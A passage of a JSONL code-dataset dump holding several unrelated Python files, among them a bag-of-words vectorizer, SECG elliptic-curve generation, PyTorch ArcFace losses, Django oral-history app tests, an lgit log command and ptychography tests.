CountVectorizer(analyzer = \"word\", \\\n tokenizer = None, \\\n preprocessor = None, \\\n stop_words = None, \\\n max_features = 5000)\n\n self.train_data_features = self.vectorizer.fit_transform(clean_train_reviews)\n self.train_data_features = self.train_data_features.toarray()\n\n # vocab = self.vectorizer.get_feature_names()\n # dist = np.sum(self.train_data_features, axis=0)\n # for tag, count in zip(vocab, dist):\n # print count, tag\n\n return self.train_data_features\n\n\n def review_to_wordlist(self, review, remove_stopwords=False ):\n review_text = re.sub(\"[^a-zA-Z\\-']\",\" \", review)\n words = review_text.lower().split()\n if remove_stopwords:\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n return (words)\n","sub_path":"bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"179340306","text":"\"\"\" Implementation of the SEC standard, see\n https://www.secg.org/sec2-v2.pdf\n https://www.secg.org/sec1-v2.pdf\n\"\"\"\n\nfrom utils import sha1, SimulatedCurves\nfrom x962_gen import X962\nfrom sage.all import ZZ, floor, GF, Integer, EllipticCurve\n\n\ndef large_prime_factor(m: ZZ, bound: int):\n \"\"\"Tests if the size of the largest prime divisor of m is upper-bounded by bound\"\"\"\n h, prime = Integer(1), Integer(2)\n tmp = m\n while h < bound and prime < bound:\n if tmp % prime == 0:\n h *= prime\n tmp = tmp // prime\n continue\n prime = prime.next_prime()\n if h >= bound:\n return False\n if tmp.is_prime():\n return h\n return False\n\n\nclass SECG(X962):\n def __init__(self, seed, p, cofactor_bound=4, cofactor_div=2):\n super().__init__(seed, p, cofactor_bound, cofactor_div)\n self._standard = \"secg\"\n self._category = \"secg\"\n self._embedding_degree_bound = 100\n\n def order_check(self):\n try:\n cardinality = EllipticCurve(GF(self._p), [self._a, self._b]).__pari__().ellsea(self._cofactor_div)\n except ArithmeticError:\n return False\n cardinality = Integer(cardinality)\n if cardinality == 0:\n return False\n cofactor = large_prime_factor(cardinality, self._cofactor_bound)\n self._cardinality = cardinality\n if not cofactor:\n return False\n self._order, self._cofactor = cardinality // cofactor, cofactor\n return True\n\n def security(self):\n super().security()\n if not self._secure:\n return\n n_1_bound = floor(self._order ** (1 - 19 / 20))\n if not (large_prime_factor(self._order - 1, n_1_bound) and large_prime_factor(self._order + 1, n_1_bound)):\n return\n self._secure = True\n\n def generate_generator(self):\n \"\"\"Returns generator as specified in SEC, currently not using\"\"\"\n c = 1\n while True:\n r = bytes(\"Base point\", 'ASCII') + bytes([1]) + bytes([c]) + bytes.fromhex(seed)\n e = ZZ(sha1(r.hex()))\n t = e % (2 * self._p)\n x, z = t % self._p, t // self._p\n c += 1\n try:\n y = self.curve().lift_x(x)[1]\n except ValueError:\n continue\n if Integer(y) % 2 == z:\n return self.curve()(x, y) * self._cofactor\n\n\ndef generate_secg_curves(count, p, seed, cofactor_bound=4, cofactor_div=2):\n \"\"\"This is an implementation of the SEC standard suitable for large-scale simulations\n \"\"\"\n simulated_curves = SimulatedCurves(\"secg\", p.nbits(), seed, count)\n curve = SECG(seed, p, cofactor_bound=cofactor_bound, cofactor_div=cofactor_div)\n for _ in range(count):\n if not curve.secure():\n curve.seed_update()\n continue\n curve.compute_properties()\n simulated_curves.add_curve(curve)\n curve = SECG(curve.seed(), p, cofactor_div=cofactor_div, cofactor_bound=cofactor_bound)\n curve.seed_update()\n return simulated_curves\n","sub_path":"standards/secg_gen.py","file_name":"secg_gen.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"170923473","text":"#!/usr/bin/python3\n\n# detecting which elements are the same in two different lists:\n\nlist1=['A','C','F','Z','L']\nlist2=['K','C','L','Z','I']\n\n# using enumerate, comprehension list, and dict:\n\nfor positionList1, elementList1 in enumerate(list1):\n for match in [elementList2 for elementList2 in list2 if elementList2 == elementList1]:\n print ('Element: ', match, ' is in both lists')\n\n# What about getting sames values if only in same position/index:\n# using comprehension list, zip, and dict\n\noutputDict2={}\nfor positionList2 in (list2.index(y) for x, y in zip(list1, list2) if y == x):\n element = list2[positionList2]\n outputDict2.update( {positionList2 : element} )\n\nprint(\"outputDict2 : \")\nfor (key, value) in outputDict2.items() :\n print(key , \" :: \", value)\n\n","sub_path":"python_practices/exercise_lists_examples.py","file_name":"exercise_lists_examples.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296779727","text":"import torch\nimport torch.nn as nn\n\nimport math\n\nimport config\n\n\n'''\nLOSSES\n'''\nclass Loss(nn.modules.Module):\n '''\n logits is output of the last layer of model\n '''\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None):\n super().__init__()\n self.weight = weight\n self.size_average = size_average\n self.reduce = reduce\n self.pos_weight = pos_weight\n self.reduction = reduction\n\nclass BCEWithLogitsLoss(Loss):\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None):\n super().__init__(weight, size_average, reduce, reduction, pos_weight)\n\n def forward(self, logits, targets):\n return nn.BCEWithLogitsLoss(reduction=self.reduction)(logits, targets.view(-1,1))\n\nclass ArcLoss(Loss):\n '''\n W = Weight at last layer\n x = last layer feature\n Z = logits\n logits = logits = Z = W*x = |W||x|cos(theta)\n normalised weights W and normalised features x sent here, |W|=1 |x|=1\n thus logits become cos(theta)\n\n MAKE SURE model logits takes care of above before using this loss\n '''\n def __init__(self, weight=None, size_average=None, reduce=None, reduction='none', pos_weight=None, feature_scale=30.0, margin=0.5):\n super().__init__(weight, size_average, reduce, reduction, pos_weight)\n self.feature_scale = feature_scale\n self.margin = margin\n self.margin_cos = math.cos(margin)\n self.margin_sin = math.sin(margin)\n self.th = math.cos(math.pi - margin)\n self.mm = math.sin(math.pi - margin) * margin\n\n def forward(self, logits, targets):\n '''\n logits = logits = cos(theta)\n margin added to theta cos(theta+margin)\n '''\n logits = logits.float()\n logits_to_sine = torch.sqrt(1 - torch.pow(logits, 2))\n logits_plus_margin = logits*self.margin_cos-logits_to_sine*self.margin_sin\n logits_plus_margin = torch.where(logits > self.th, logits_plus_margin, logits-self.mm)\n targets_onehot = torch.FloatTensor(targets.size(0), config.TARGET_SIZE+1).to(targets.device)\n targets_onehot.zero_()\n targets_onehot.scatter_(1, targets.view(-1,1).long(), 1)\n# print(targets_onehot)\n\n logits_plus_margin = (targets_onehot*logits_plus_margin)+((1-targets_onehot)*logits)\n\n logits_plus_margin *= self.feature_scale\n loss = torch.nn.CrossEntropyLoss(reduction=self.reduction)(logits_plus_margin, targets.long())\n \n return loss\n \n\n'''\nOPTIMIZER AND SCHEDULER\n'''\nclass OptSch:\n def __init__(self, sch=None, opt='Adam'):\n self.lr = config.INIT_LEARNING_RATE\n self.opt = opt\n self.sch = sch\n self.eta_min = config.ETA_MIN\n self.T_0 = config.T_0\n self.T_max=config.T_MAX\n \n def get_opt_sch(self, model):\n if self.opt=='Adam':\n optimizer = torch.optim.Adam(model.parameters(), lr = self.lr)\n \n if self.sch=='CosineAnnealingWarmRestarts':\n scheduler = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(optimizer,\n T_0 = self.T_0,\n eta_min = self.eta_min,\n last_epoch = -1)\n elif self.sch=='ReduceLROnPlateau':\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n factor=config.FACTOR, patience=config.PATIENCE,\n verbose=True, eps=config.EPS)\n elif self.sch=='CosineAnnealingLR':\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,\n T_max = self.T_max,\n eta_min = self.eta_min,\n last_epoch = -1)\n elif self.sch==None:\n scheduler=None\n return optimizer, scheduler\n","sub_path":"srcv2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612342961","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\n\nfrom django.contrib.admin.sites import AdminSite\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n# from urllib import urlencode\n\nfrom .models import Interview, OralHistory, Tag\nfrom .forms import OHPForm, TagForm, InterviewForm\nfrom .apps import OralHistoryConfig\nfrom .admin import TagAdmin, InterviewAdmin, OHPAdmin\n\nfrom project_share.models import Project, Application\nfrom django_teams.models import Team\n\n# Create your tests here.\n\n\nclass MockRequest(object):\n pass\n\n\nrequest = MockRequest()\n\n\nclass InterviewTestCase(TestCase):\n def setUp(self):\n self.tag_admin = TagAdmin(Tag, AdminSite())\n self.int_admin = InterviewAdmin(Interview, AdminSite())\n self.ohp_admin = OHPAdmin(OralHistory, AdminSite())\n self.user = get_user_model().objects.create_user(username='test-user',\n email='test@test.com',\n password='testpassword')\n self.ohp = OralHistory.objects.create(project_name=\"Test OHP\",\n byline=\"OHP Byline\",\n summary=\"OHP Summary\",\n slug=\"test-ohp\",\n is_official=True,\n approved=True,\n user=self.user)\n app = Application.objects.create(name=\"test_app\", application_type=\"OHP\")\n self.csdt = Project.objects.create(name=\"csdt_proj\", application=app)\n self.interview = Interview.objects.create(project=self.ohp,\n full_name=\"John Doe\",\n date=\"2018-11-11\",\n location=\"Troy, NY\",\n interview_by=\"Jane Doe\",\n birthplace=\"Anytown, USA\",\n occupation=\"Worker\",\n birth_year=\"1960\",\n slug=\"john-doe\",\n approved=True,\n csdt_project=self.csdt,\n user=self.user)\n self.classroom = Team.objects.create()\n\n def test_unicode_models(self):\n self.assertEqual(self.interview.__unicode__(), \"Test OHP => John Doe by test-user\")\n self.assertEqual(self.ohp.__unicode__(), \"Project: Test OHP by test-user\")\n\n def test_ohp_views(self):\n url = '/oralhistory/test-ohp/'\n response = self.client.get(url, **{'HTTP_REFERER': url})\n self.assertTrue(response.status_code == 300 or response.status_code == 200,\n msg=\"Got code %s on %s\" % (response.status_code, url))\n url = '/oralhistory/test-ohp/john-doe'\n response = self.client.get(url, **{'HTTP_REFERER': url})\n self.assertTrue(response.status_code == 300 or response.status_code == 200,\n msg=\"Got code %s on %s\" % (response.status_code, url))\n # self.assertQuerysetEqual(OralHistory.objects.all(), )\n\n def test_interview_form(self):\n form_data = {\n 'full_name': \"Jane Doe\",\n 'date': '2011-11-11',\n 'location': 'Troy, NY',\n 'interview_by': 'Django',\n 'birthplace': 'New York',\n 'occupation': 'Teacher',\n 'birth_year': '1980',\n 'summary': 'Interview summary',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n form = InterviewForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n int_form = form.save(commit=False)\n int_form.project = self.ohp\n int_form.csdt_project = self.csdt\n # team = Team.objects.get()\n # int_form.classroom = team\n form.save()\n int_form.save()\n self.assertEqual(int_form.summary, 'Interview summary')\n self.assertEqual(int_form.birth_year, '1980')\n self.assertEqual(int_form.occupation, 'Teacher')\n self.assertEqual(int_form.birthplace, 'New York')\n self.assertEqual(int_form.interview_by, 'Django')\n self.assertEqual(int_form.location, 'Troy, NY')\n self.assertEqual(int_form.date, datetime.date(2011, 11, 11))\n self.assertEqual(int_form.full_name, 'Jane Doe')\n self.assertEqual(int_form.slug, 'jane-doe')\n # test admin actions:\n queryset = Interview.objects.all()\n self.int_admin.actions[0](self.int_admin, request, queryset)\n self.assertTrue(Interview.objects.get(slug='jane-doe').approved)\n self.int_admin.actions[1](self.int_admin, request, queryset)\n self.assertFalse(Interview.objects.get(slug='jane-doe').approved)\n\n # test update view\n\n form_data2 = {\n 'full_name': \"Joe Doe\",\n 'date': '2018-10-10',\n 'location': 'Albany, NY',\n 'interview_by': 'Mr. Noone',\n 'birthplace': 'Mexico',\n 'occupation': 'Writer',\n 'birth_year': '1955',\n 'summary': 'Summary of Interview',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview_update',\n kwargs={'slug': 'test-ohp',\n 'slug_interview': 'jane-doe'}),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(Interview.objects.all().count(), 2)\n\n # test post form\n\n form_data2 = {\n 'full_name': \"Johnny Doe\",\n 'date': '2018-10-10',\n 'location': 'Albany, NY',\n 'interview_by': 'Mr. Noone',\n 'birthplace': 'Mexico',\n 'occupation': 'Writer',\n 'birth_year': '1955',\n 'summary': 'Summary of Interview',\n 'user': self.user.pk,\n 'project': self.ohp.pk,\n 'classroom': self.classroom.pk,\n }\n\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview_update',\n kwargs={'slug': 'test-ohp',\n 'slug_interview': 'joe-doe',\n }),\n data=form_data2, follow=True)\n\n def test_oralhistory_form(self):\n form_data = {\n 'is_official': False,\n 'project_name': 'test-OHP-2',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-2',\n 'user': self.user.pk}\n form = OHPForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n ohp_form = form.save()\n self.assertEqual(ohp_form.summary, 'ohp summary')\n self.assertEqual(ohp_form.byline, 'new oralhistory project')\n self.assertEqual(ohp_form.slug, 'test-ohp-2')\n self.assertEqual(ohp_form.project_name, 'test-OHP-2')\n self.assertEqual(ohp_form.approved, False)\n self.assertEqual(ohp_form.is_official, False)\n self.assertEqual(ohp_form.user, self.user)\n # test admin actions:\n queryset = OralHistory.objects.all()\n self.ohp_admin.actions[0](self.ohp_admin, request, queryset)\n self.assertTrue(OralHistory.objects.get(slug='test-ohp-2').approved)\n self.ohp_admin.actions[1](self.ohp_admin, request, queryset)\n self.assertFalse(OralHistory.objects.get(slug='test-ohp-2').approved)\n\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-3',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-3',\n 'user': self.user.pk}\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:upload_ohp'),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n # print response.content\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-4',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-4',\n }\n response = self.client.post(reverse('oral_history:upload_ohp'),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n self.assertContains(response, 'error')\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n # test the update form view\n form_data2 = {\n 'is_official': False,\n 'project_name': 'test-OHP-3',\n 'byline': 'new oralhistory project',\n 'summary': 'ohp summary',\n 'slug': 'test-ohp-3',\n 'user': self.user.pk,\n }\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:update_ohp',\n kwargs={'slug': 'test-ohp-3',\n }),\n data=form_data2, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n\n self.assertEqual(OralHistory.objects.all().count(), 3)\n\n def test_tag_form(self):\n interv = Interview.objects.get(slug=\"john-doe\")\n # Interview.objects.get(slug='john-doe')\n form_data = {'hours': 0,\n 'mins': 1,\n 'secs': 25,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n form = TagForm(data=form_data)\n self.assertTrue(form.is_valid(), form.errors)\n tag_form = form.save(commit=False)\n tag_form.timestamp = datetime.timedelta(seconds=85)\n tag_form.approved = True\n tag_form.interview = interv\n form.save()\n tag_form.save()\n self.assertEqual(tag_form.tag, 'talks about the city')\n self.assertEqual(tag_form.timestamp, datetime.timedelta(seconds=85))\n self.assertEqual(tag_form.interview, self.interview)\n self.assertEqual(tag_form.approved, True)\n self.assertEqual(tag_form.__unicode__(),\n \"Tag: Test OHP: John Doe => \\\"talks about the city\\\", 00:01:25\")\n self.assertEqual(tag_form.to_timestamp(), \"00:01:25\")\n tag_form.timestamp = datetime.timedelta(seconds=3601)\n tag_form.save()\n self.assertEqual(tag_form.to_timestamp(), \"01:00:01\")\n # test honeypot\n form_data2 = {'hours': 0,\n 'mins': 1,\n 'secs': 25,\n 'tag': 'talks about the city',\n 'honeypot': 'male',\n 'approved': True}\n form2 = TagForm(data=form_data2)\n with self.assertRaises(ValueError):\n form2.save()\n self.assertEqual(Tag.objects.filter(\n tag='talks about the city').count(), 1)\n # test admin:\n queryset = Tag.objects.filter(pk=1)\n self.tag_admin.actions[0](self.tag_admin, request, queryset)\n self.assertTrue(Tag.objects.get(pk=1).approved)\n self.tag_admin.actions[1](self.tag_admin, request, queryset)\n self.assertFalse(Tag.objects.get(pk=1).approved)\n\n form_data3 = {'hours': 0,\n 'mins': 1,\n 'secs': 26,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data3, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'Thank you')\n self.assertEqual(Tag.objects.all().count(), 2)\n\n form_data4 = {'hours': 0,\n 'mins': 1,\n 'secs': 26,\n 'tag': 'talks about the city',\n 'honeypot': 'shouldnt be here',\n 'approved': True}\n # self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data4, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n\n self.assertContains(response, 'error')\n self.assertEqual(Tag.objects.all().count(), 2)\n\n # logged in auto approves\n self.assertTrue(self.client.login(username='test-user', password='testpassword'))\n form_data5 = {'hours': 0,\n 'mins': 1,\n 'secs': 27,\n 'tag': 'talks about the city',\n 'honeypot': '',\n 'approved': True}\n\n response = self.client.post(reverse('oral_history:interview',\n kwargs={'slug': self.ohp.slug,\n 'slug_interview': interv.slug}),\n data=form_data5, follow=True)\n self.assertTrue(response.status_code == 200,\n msg=\"Got code %s\" % (response.status_code))\n self.assertContains(response, 'Thank you')\n self.assertEqual(Tag.objects.all().count(), 3)\n\n def test_uploadinterview_post_form(self):\n pass\n\n def test_apps(self):\n self.assertEqual(OralHistoryConfig.name, 'oral_history')\n # self.assertEqual(apps.get_app_config('oral_history').name, 'oral_history')\n","sub_path":"oral_history/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232977775","text":"#%%\nimport re\nWORD_SPLIT = re.compile(\",\")\ntarget = \"i,have,a,dream.\"\nwords = []\nwords.extend(WORD_SPLIT.split(target))\nprint(words)\n\n#%%\nimport string\noriginal = \"axbycz\"\ntable = original.translate({'a': \"1\"})\nprint(table)\n","sub_path":"python/basic/string_do.py","file_name":"string_do.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65858366","text":"#!/usr/bin/env python3\nimport os\nfrom datetime import datetime\nfrom os import path, scandir\nfrom os.path import isfile, join\nfrom utility import get_mtime\n\n\ndef show_log_lgit(args, parent_dir):\n \"\"\"\n Show the history of commits, from newest to oldest\n\n Input:\n - args: the arguments that were parsed by the parser\n - parent_dir: the directory that contains the lgit repository\n \"\"\"\n # Get the list of commit files\n dir_entry_list = [dir_entry for dir_entry\n in scandir(join(parent_dir, \".lgit/commits\"))\n if isfile(dir_entry.path)]\n # Sort these files by their modification time\n dir_entry_list.sort(key=get_mtime)\n # Print the log for each commit file\n while dir_entry_list:\n dir_entry = dir_entry_list.pop()\n print_log(dir_entry)\n\n\ndef print_log(dir_entry):\n \"\"\"\n Print the log from a commit directory entry\n\n Input:\n - dir_entry: A DirEntry object of the commit object\n \"\"\"\n # Read and transform all the needed infos\n try:\n commit_file = open(dir_entry.path, \"r\")\n content = commit_file.readlines()\n # Get author name\n author = content[0].rstrip()\n # Get the time from commit file and reformat it\n datetime_text = \" \".join([content[1][:4],\n content[1][4:6],\n content[1][6:8],\n content[1][8:10],\n content[1][10:12],\n content[1][12:-1]])\n # Convert it to human-readable date and time\n date = datetime.strptime(datetime_text, \"%Y %m %d %H %M %S\").ctime()\n except PermissionError:\n return\n # Print all the infos\n print(\"\"\"commit %s\nAuthor: %s author)\nDate: %s date\n\n %s\n\"\"\" % (dir_entry.name, author, date, content[3]))\n","sub_path":"show_log_lgit.py","file_name":"show_log_lgit.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216514683","text":"n = int(input())\r\nd = []\r\nfor i in range(n):\r\n w = input()\r\n d.append(w)\r\nx = set(d)\r\nd = list(x)\r\nd.sort()\r\nd.sort(key = len)\r\nfor i in d:\r\n print(i)\r\n","sub_path":"week3/14-7_신예준_20210724.py","file_name":"14-7_신예준_20210724.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"251932196","text":"from sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVR\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\n\nC = (0.1, 0.5, 1, 5, 10)\nkernel = ('linear', 'rbf', 'sigmoid')\nparam_grid = {'C':C, 'kernel':kernel}\nsvr = SVR()\ncvmodel = GridSearchCV(svr, param_grid, refit=True, cv=5)\nmodel_name = sys.argv[0].split('/')[-1].replace('.py','')\npath = sys.argv[1]\nfold = sys.argv[2]\nf_id = sys.argv[3]\ntrn_X = np.load(path+'data2/fold_'+fold+'/train/X/'+f_id+'.npz')['arr_0']\ntrn_y = np.load(path+'data2/fold_'+fold+'/train/y/'+f_id+'.npz')['arr_0']\ntst_X = np.load(path+'data2/fold_'+fold+'/test/X/'+f_id+'.npz')['arr_0']\nscaler = pd.read_pickle(path+'data2/fold_'+fold+'/scaler/'+f_id+'.pickle')\n\ncvmodel.fit(trn_X, trn_y.ravel())\npred_y = scaler.inverse_transform(cvmodel.predict(tst_X))\n\nif not os.path.exists(path+'data2/results/'+model_name+'/fold_'+fold+'/'):\n os.makedirs(path+'data2/results/'+model_name+'/fold_'+fold+'/')\nnp.savez_compressed(path+'data2/results/'+model_name+'/fold_'+fold+'/'+f_id+'.npz', pred_y)\npd.to_pickle(cvmodel, path+'data2/results/'+model_name+'/fold_'+fold+'/'+f_id+'.model')\n","sub_path":"experiments/baselines/scripts/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"254849060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# #########################################################################\n# Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved. #\n# #\n# Copyright 2015. UChicago Argonne, LLC. This software was produced #\n# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #\n# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #\n# U.S. Department of Energy. The U.S. Government has rights to use, #\n# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #\n# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #\n# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #\n# modified to produce derivative works, such modified software should #\n# be clearly marked, so as not to confuse it with the version available #\n# from ANL. #\n# #\n# Additionally, redistribution and use in source and binary forms, with #\n# or without modification, are permitted provided that the following #\n# conditions are met: #\n# #\n# * Redistributions of source code must retain the above copyright #\n# notice, this list of conditions and the following disclaimer. #\n# #\n# * Redistributions in binary form must reproduce the above copyright #\n# notice, this list of conditions and the following disclaimer in #\n# the documentation and/or other materials provided with the #\n# distribution. #\n# #\n# * Neither the name of UChicago Argonne, LLC, Argonne National #\n# Laboratory, ANL, the U.S. Government, nor the names of its #\n# contributors may be used to endorse or promote products derived #\n# from this software without specific prior written permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #\n# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #\n# POSSIBILITY OF SUCH DAMAGE. #\n# #########################################################################\n\nimport lzma\nimport os\nimport pickle\nimport unittest\n\nimport numpy as np\n\nimport tike.ptycho\nfrom tike.communicators import Comm, MPIComm\nimport tike.random\n\n__author__ = \"Daniel Ching\"\n__copyright__ = \"Copyright (c) 2018, UChicago Argonne, LLC.\"\n__docformat__ = 'restructuredtext en'\n\ntestdir = os.path.dirname(__file__)\n\n\nclass TestPtychoUtils(unittest.TestCase):\n \"\"\"Test various utility functions for correctness.\"\"\"\n\n def test_gaussian(self):\n \"\"\"Check ptycho.gaussian for correctness.\"\"\"\n fname = os.path.join(testdir, 'data/ptycho_gaussian.pickle.lzma')\n weights = tike.ptycho.probe.gaussian(15, rin=0.8, rout=1.0)\n if os.path.isfile(fname):\n with lzma.open(fname, 'rb') as file:\n truth = pickle.load(file)\n else:\n with lzma.open(fname, 'wb') as file:\n truth = pickle.dump(weights, file)\n np.testing.assert_array_equal(weights, truth)\n\n def test_check_allowed_positions(self):\n psi = np.empty((7, 4, 9))\n probe = np.empty((7, 1, 1, 8, 2, 2))\n scan = np.array([[1, 1], [1, 6.9], [1.1, 1], [1.9, 5.5]])\n tike.ptycho.check_allowed_positions(scan, psi, probe.shape)\n\n for scan in np.array([[1, 7], [1, 0.9], [0.9, 1], [1, 0]]):\n with self.assertRaises(ValueError):\n tike.ptycho.check_allowed_positions(scan, psi, probe.shape)\n\n def test_split_by_scan(self):\n scan = np.mgrid[0:3, 0:3].reshape(2, 1, -1)\n scan = np.moveaxis(scan, 0, -1)\n\n ind = tike.ptycho.ptycho.split_by_scan_stripes(scan, 3, axis=0)\n split = [scan[:, i] for i in ind]\n solution = [\n [[[0, 0], [0, 1], [0, 2]]],\n [[[1, 0], [1, 1], [1, 2]]],\n [[[2, 0], [2, 1], [2, 2]]],\n ]\n np.testing.assert_equal(split, solution)\n\n ind = tike.ptycho.ptycho.split_by_scan_stripes(scan, 3, axis=1)\n split = [scan[:, i] for i in ind]\n solution = [\n [[[0, 0], [1, 0], [2, 0]]],\n [[[0, 1], [1, 1], [2, 1]]],\n [[[0, 2], [1, 2], [2, 2]]],\n ]\n np.testing.assert_equal(split, solution)\n\n\nclass TestPtychoRecon(unittest.TestCase):\n \"\"\"Test various ptychography reconstruction methods for consistency.\"\"\"\n\n def create_dataset(\n self,\n dataset_file,\n pw=16,\n eigen=1,\n width=128,\n ):\n \"\"\"Create a dataset for testing this module.\n\n Only called with setUp detects that `dataset_file` has been deleted.\n \"\"\"\n import libimage\n # Create a stack of phase-only images\n phase = np.stack(\n [libimage.load('satyre', width),\n libimage.load('satyre', width)],\n axis=0,\n )\n amplitude = np.stack(\n [\n 1 - 0 * libimage.load('coins', width),\n 1 - libimage.load('coins', width)\n ],\n axis=0,\n )\n original = amplitude * np.exp(1j * phase * np.pi)\n self.original = original.astype('complex64')\n leading = self.original.shape[:-2]\n\n # Create a multi-probe with gaussian amplitude decreasing as 1/N\n phase = np.stack(\n [\n 1 - libimage.load('cryptomeria', pw),\n 1 - libimage.load('bombus', pw)\n ],\n axis=0,\n )\n weights = 1.0 / np.arange(1, len(phase) + 1)[:, None, None]\n weights = weights * tike.ptycho.probe.gaussian(pw, rin=0.8, rout=1.0)\n probe = weights * np.exp(1j * phase * np.pi)\n self.probe = np.tile(\n probe.astype('complex64'),\n (*leading, 1, eigen, 1, 1, 1),\n )\n\n pad = 2\n v, h = np.meshgrid(\n np.linspace(pad, original.shape[-2] - pw - pad, 13, endpoint=True),\n np.linspace(pad, original.shape[-1] - pw - pad, 13, endpoint=True),\n indexing='ij',\n )\n scan = np.stack((np.ravel(v), np.ravel(h)), axis=1)\n self.scan = np.tile(\n scan.astype('float32'),\n (*leading, 1, 1),\n )\n\n self.data = tike.ptycho.simulate(\n detector_shape=pw * 2,\n probe=self.probe,\n scan=self.scan,\n psi=self.original,\n )\n\n assert self.data.shape == (*leading, 13 * 13, pw * 2, pw * 2)\n assert self.data.dtype == 'float32', self.data.dtype\n\n setup_data = [\n self.data,\n self.scan,\n 